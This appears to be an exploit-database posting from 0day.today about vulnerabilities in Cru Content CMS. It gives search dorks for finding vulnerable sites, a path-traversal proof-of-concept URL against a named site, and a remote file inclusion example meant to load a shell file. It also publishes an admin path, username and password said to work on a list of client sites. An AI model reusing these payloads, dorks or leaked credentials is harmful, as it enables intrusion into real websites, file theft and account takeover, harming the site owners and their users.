Lucene search
Fx01337DAY-ID-11184HistoryMar 06, 2010 - 12:00 a.m.
Cru Content CMS remote file disclosure vulnerability
2010-03-0600:00:00
fx0
0day.today
10
Exploit for unknown platform in category web applications
====================================================
Cru Content CMS remote file disclosure vulnerability
====================================================
[~]"Cru Content" Remote File Download Vulnerability
[~]CMS Site:crudigital.com.au<http://crudigital.com.au>
[~]Dork:"Powered By Cru Content"
[~]POC:www.cloudland.tv/cms/download.php?file=../index.php<http://www.cloudland.tv/cms/download.php?file=../index.php>
[~]Found by fx0
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[~]This vuln is just pure human stupidity
[~]You can find vuln links here = http://www.warpstudio.com/hrvatski/reference/
[~]For every site the username and the password is the same
[~]Admin path /admin/
[~]Username:atila
[~]Password:bicbozji
[~]Found by fx0.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[~]Dork: inurl:".php?func=page_cms"
[~]Ex: www.site.com/index.php?func=<http://www.site.com/index.php?func=><shell.txt?>
[~]Found by fx0.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# 0day.today [2018-04-12] #